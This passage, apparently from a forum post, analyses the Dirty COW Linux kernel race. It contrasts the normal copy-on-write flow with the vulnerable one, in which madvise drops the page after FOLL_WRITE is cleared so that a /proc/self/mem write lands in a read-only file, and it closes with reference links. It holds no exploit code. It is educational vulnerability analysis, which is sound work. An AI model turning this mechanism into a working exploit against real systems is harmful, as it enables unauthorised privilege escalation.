When the next write happens, the resulting page fault makes do_fault bring the page in again. Because FOLL_WRITE is now 0, the write no longer causes the permission conflict it did the first time; the kernel simply returns the file's own page, and the subsequent write is carried through to the read-only file. The result is an out-of-permission write (because no COW was performed):

do_fault()
    do_read_fault()  // now if (!(flags & FAULT_FLAG_WRITE)) holds

Flow summary

Normal flow:

Try to write to read-only memory via /proc/self/mem
-> page fault (page not present)
-> page fault (permission conflict): write permission is required, enter do_cow_fault() -> create the COW copy -> clear FOLL_WRITE -> write to the COW copy

Vulnerable flow:

Try to write to read-only memory via /proc/self/mem
-> page fault (page not present)
-> page fault (permission conflict): write permission is required, enter do_cow_fault() -> create the COW copy -> clear FOLL_WRITE
-> madvise quickly drops the page whose FOLL_WRITE flag has just been cleared
-> page fault brings the page back in; write permission is no longer required, so do_read_fault() returns the file's own page directly, and the write goes through out of permission.

References

https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

Copy on Write

https://blog.csdn.net/qq_26768741/article/details/54375524

mm_struct

https://www.cnblogs.com/wanpengcoder/p/11761063.html

Linux paging: how the paging mechanism is implemented

Linux memory management: page faults

User-space page fault handling pte_handle_fault(), part 2: copy-on-write

KSM (Kernel Samepage Merging)

A brief introduction to how the various page fault cases are handled


Last edited by ScUpax0s on 2021-1-13 13:19.